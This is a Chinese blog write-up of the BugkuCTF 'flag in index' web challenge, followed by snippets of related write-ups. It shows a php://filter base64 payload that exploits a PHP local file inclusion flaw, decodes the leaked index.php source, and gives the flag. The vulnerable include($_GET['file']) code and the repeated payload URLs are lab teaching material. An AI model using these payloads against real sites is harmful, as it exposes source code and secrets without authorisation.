BugkuCTF flag在index里

最新推荐文章于 2020-11-24 19:55:41 发布
原创 最新推荐文章于 2020-11-24 19:55:41 发布 · 262 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍PHP中的协议流功能,特别是php://filter的应用,并通过实例展示了如何使用此功能进行base64编码和解码操作。同时,揭示了一个包含flag的PHP代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述查看源代码 没有任何提示

  1. 点击click me在这里插入图片描述跳转到show.php
  2. php://filter
    大佬解释

php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出:readfile("php://filter/read=convert.base64-encode/resource=php://input")
构造语句php://filter/read/convert.base64-encode/resource=index.php

在这里插入图片描述得到PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

3.解码

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

得到 flag{edulcni_elif_lacol_si_siht}

bugkuCTF---flagindex
Glad you came
03-15 1529
题目来源:https://ctf.bugku.com/challenges 点击click me?no 之后url变成了这样 出现了 file=show.php,说明可能有文件包含漏洞, 所以构建url: http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resour...
Bugku Web CTF-flagIndex
No Title
12-09 1034
Bugku Web CTF-flagIndex 查看网页源码。 <html> <title>Bugku-ctf</title> <a href="./index.php?file=show.php">click me? no</a></html> 观察URL的格式,让人联想到文件包含漏洞。然而并没有看到...
BUGkuCTF-flagindex
dfhjlll的博客
12-21 333
进入页面后,查看源代码和消息头都没有flag,提示是flagindex,看到URL好像是文件包含,试一下,http://123.206.87.240:8005/post/?file=php://filter/read=convert.base64-encode/resource=index.php 出来一堆字符,进行base64解码,在解码就有flag...
BugkuCTFflagindex
qq_39368007的博客
06-09 227
注意到url地址http://123.206.87.240:8005/post/index.php?file=show.php 这是一个典型的文件包含漏洞,(file关键字是提示,其实也是CTF的套路)。 http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/...
bugkuctf——flag就在index
weixin_40980428的博客
03-30 2012
打开链接后看到一串英文字符“点我?不”,点开看看发现了file参数原来是文件包含漏洞,通过php://filter读取index源码--&gt;php://filter/read=convert.base64-encode/resource=index.phpburp,然后将其进行base64解密得到flag...
bugku flagindex
rommel的博客
08-01 5173
首先进去界面是一个这样的界面 我们点击后发现网址变成了http://120.24.86.145:8005/post/index.php?file=show.php我们看到了file关键字 于是我们就想到了php://filter 如果不懂的话这给大家一篇博客 点击打开链接 所以我们把网址改为 http://120.24.86.145:8005/post/index
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2225
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这是使用is_numeric遇到%00截断的漏洞,这构造 http://120.24.86.145:8002.
BugKuCTF WEB
让我再浪一会 的博客
11-24 1032
文章目录BugKuCTF WEB一、web2二、计算器三、web基础$_GET四、web基础$_POST五、矛盾六、web3七、域名解析八、你必须让他停下九、变量1十、web5十一、头等舱十二、网站被黑十三、管理员系统十四、web4十五、flagindex十六、输入密码查看flag BugKuCTF WEB 平台地址 一、web2 进入网页,查看源代码,在其中找到flag 二、计算器 进入网页,根据题目可得知需要输入运算结果,但限制了输入的数字的个数,查看网页的JS代码,将 maxlength =
BugkuCTF练习题解——Web一
qq_41739275的博客
08-24 7069
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flagindex中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugkuCTFflagindex;输入密码查看flag
s0il的博客
02-16 3397
flagindex 题目是这样:                                          点击之后是这样:                                              url变成了: http://123.206.87.240:8005/post/index.php?file=show.php 看到大佬的解答,因为有fil...
bugku ctf flagindex
qq_42777804的博客
05-18 702
点击click me? no 注意到 http://123.206.87.240:8005/post/index.php?file=show.php 这是一个典型的文件包含漏洞,(file关键字是提示) 之后查阅用法: php://filter php://filter是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)...
CTF/CTF练习平台-flagindexphp://filter的利用】
Sp4rkW的博客
08-20 4万+
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://12...
BugkuCTF——web篇writeup(持续更新)
热门推荐
过客璇璇的博客
03-23 6万+
BugkuCTF——web篇writeup 平台网址:http://ctf.bugku.com/ 平台首页: web2 网址链接:http://120.24.86.145:8002/web2/ 页面: 一看只有好多滑稽,分数也不太高,应该不是很难,F12打开开发者工具看一下 得到ctf:flag KEY{Web-2-bugKssNNikls9100} 文件上传测试 链...
BugkuCTF之web题之过狗一句话
A_dmin的博客
12-09 819
BugkuCTF之web题之过狗一句 首先进入题目时发现: 这个题目给出的代码不是让我们能够用assert函数执行任意命令s吗?? 既然如此,那就扫描一下后台咯。执行:s=print_r(scandir(%27./%27)); 发现: 那就两个都看一看咯。 最后发现flag在f14g.txt中: ...
07BugkuCTF的文件包含项目
qq_28241709的博客
08-05 599
进入BugkuCTF之前我们先了解一下文件包含的基础知识。 一、文件包含 1.概念 文件包含:程序员通常会把可重复使用函数或语句写到单个文件中,在使用某个功能时,直接调用此文件,不用再编写调用文件的过程称为包含。 2.PHP 中的⽂件包含语句 PHP 提供了四个⽂件包含的语句,四个语句之间略有不同: 语句 区别 include() 多次包含,如果包含失败,脚本产⽣警告,继续运⾏。 include_once() ⼀次包含,如果包含失败,脚本产⽣警告,继续运⾏。 require() 多次
bugku flagindex
Seaern的博客
07-02 352
题目链接 第二个界面发现url为: http://123.206.87.240:8005/post/index.php?file=show.php 参数有file选项,联想到了文件包含漏洞 结合题目提示: flagindex 通过PHP内置协议直接读取代码 PHP内置协议 通过构造如下语句: http://xxx.com/index.php?file=php://fil...
CTF之Bugku flagindex
weixin_41607190的博客
10-08 1087
这是一道重新温习的题,直接来看。 “点我?不” 我就点!基本操作还是要看看源代码的,不过这个没什么好看的就不贴图了。 点完后发现URL后面有个 file=balabalabala 的,就联想到php://filter 不明白为什么会这样联想的就看看这个文章。 简单来说就是查看网页同一目录下的另一个文件。 怎么查看呢? 在file=后面加上这样一个语句php://filter/read=conv...
bugku_web flagindex
didid_w的博客
05-01 635
打开网页:点击之后url变成了:看到?file=show.php在结合题目 flagindex 很容易想到文件包含试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤通过php伪协议利用PHP://filter/read=c...
2021 BugKu CTF AWD排位赛真题解析
BugKu 2021 CTF AWD排位赛真题涵盖了信息安全领域中一项重要的技能竞技——Capture The Flag(CTF)的高级竞赛部分,即AWD(Attack With Defense,攻防对抗)模式。该模式特别强调攻防兼备的技能,要求参赛者在进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值